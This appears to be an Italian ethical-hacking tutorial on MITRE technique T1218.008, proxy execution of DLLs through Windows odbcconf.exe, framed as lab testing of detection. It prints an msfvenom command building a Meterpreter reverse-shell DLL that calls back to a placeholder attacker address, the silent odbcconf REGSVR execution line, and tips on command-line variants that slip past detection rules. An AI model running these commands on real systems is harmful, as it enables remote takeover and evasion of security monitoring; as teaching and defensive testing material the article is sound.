Proxy Execution via ODBC: Odbcconf (T1218.008)

Odbcconf.exe è un'utilità Windows nativa, firmata digitalmente da Microsoft, progettata per configurare driver ODBC e data source name. Come spesso accade con i cosiddetti Living-off-the-Land Binaries (LOLBins), la sua legittimità lo rende invisibile a molte soluzioni di application control. La tecnica T1218.008 sfrutta proprio questa fiducia implicita: attraverso il flag REGSVR, l'attaccante può caricare ed eseguire una DLL arbitraria nel contesto del processo odbcconf.exe, ottenendo esecuzione di codice malevolo mascherata da attività di sistema ordinaria.

La tecnica si colloca nella tattica Defense Evasion (TA0005), la fase della kill chain in cui l'avversario cerca di eludere i controlli difensivi per mantenere la propria presenza senza destare allarmi. Il meccanismo è concettualmente identico all'abuso di Regsvr32: un binario trusted funge da proxy per il caricamento di payload malevoli, aggirando policy che non contemplano esplicitamente questo vettore.

I numeri del framework documentano 1 gruppo APT, 2 famiglie malware e 2 mitigazioni specifiche associate a questa tecnica, a conferma di un impiego reale ma circoscritto a operatori che prediligono catene di evasion sofisticate. La semplicità sintattica del comando — una singola riga — rende questa tecnica particolarmente insidiosa: non richiede privilegi elevati, non genera artefatti vistosi e si mimetizza nel rumore di fondo dei processi di sistema.

La simulazione di questa tecnica in laboratorio è estremamente lineare e rappresenta un test fondamentale per validare le policy di application control del cliente. L'obiettivo è verificare se l'ambiente target monitora l'esecuzione di odbcconf.exe e se le soluzioni EDR correlano il caricamento di DLL non standard da parte di questo binario.

Il punto di partenza è la generazione di una DLL di test. Con msfvenom (open source, parte del framework Metasploit) si può creare un payload che apra una reverse shell o, in scenari meno invasivi, una semplice DLL che scriva un file marker su disco per confermare l'esecuzione:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_ATTACCANTE> LPORT=4444 -f dll -o payload.dll

Una volta trasferita la DLL sulla macchina target, l'esecuzione avviene con un singolo comando:

odbcconf.exe /S /A {REGSVR "C:\Users\Public\payload.dll"}

Il flag /S sopprime i messaggi di dialogo, rendendo l'esecuzione silenziosa. Il blocco {REGSVR ...} istruisce odbcconf a invocare la funzione DllRegisterServer della libreria specificata, che è esattamente il punto di ingresso usato dal payload malevolo.

Per un test più discreto, senza reverse shell, si può usare una DLL custom compilata con MinGW (open source) che esegua operazioni benigne ma verificabili — ad esempio la creazione di un file in una directory monitorata. Questo approccio è preferibile nelle fasi iniziali di un engagement, quando si vuole solo validare la detection senza attivare alert critici.

Vale la pena testare anche varianti della command line per verificare la robustezza delle regole di detection. Alcuni ambienti rilevano solo il pattern esatto /A {REGSVR, ma non catturano invocazioni con percorsi UNC (\server\share\payload.dll) o con variabili d'ambiente espanse nel path. Atomic Red Team (open source) include il test atomico T1218.008, che automatizza questa simulazione e può essere lanciato tramite il modulo PowerShell Invoke-AtomicTest:

Invoke-AtomicTest T1218.008

Dopo l'esecuzione, verificare con il blue team se l'alert è stato generato, se il parent process è stato correttamente identificato e se la DLL caricata è stata sottoposta ad analisi. Se nessuno di questi controlli ha funzionato, il finding va documentato come gap critico di detection.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.